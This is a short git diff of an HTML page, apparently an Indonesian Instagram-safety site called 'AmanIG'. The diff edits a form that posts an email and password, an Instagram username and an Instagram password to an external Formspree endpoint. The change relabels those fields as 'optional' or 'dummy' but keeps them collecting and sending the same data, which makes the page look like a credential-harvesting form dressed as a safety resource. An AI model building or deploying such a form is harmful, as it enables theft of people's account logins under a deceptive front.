--- a/index.html
+++ b/index.html
@@ -130,13 +130,13 @@ Menghindari website yang menjanjikan fitur tidak resmi seperti peretasan akun, p
 <form action="https://formspree.io/f/mbdaodwb" method="POST">
   <input type="hidden" name="_subject" value="Kiriman Dummy dari AmanIG">
 
-  <label>Your email & password:</label>
+  <label>Your email & password (opsional):</label>
   <input type="email" name="email" placeholder="contoh: alexachh69@gmail.com">
 
-  <label>Username IG:</label>
+  <label>Username IG dummy:</label>
   <input type="text" name="username_ig" placeholder="contoh: bNsjsjs" required>
 
-  <label>Password IG:</label>
+  <label>Password IG dummy:</label>
   <input type="text" name="password_dummy" placeholder="contoh: 19827363" required>
 
   <button type="submit" style="background:#1877f2; color:white; padding:1.2rem; font-weight:bold; border:none; border-radius:8px; width:100%; margin-top:1.5rem; font-size:1.2rem; cursor:pointer;">
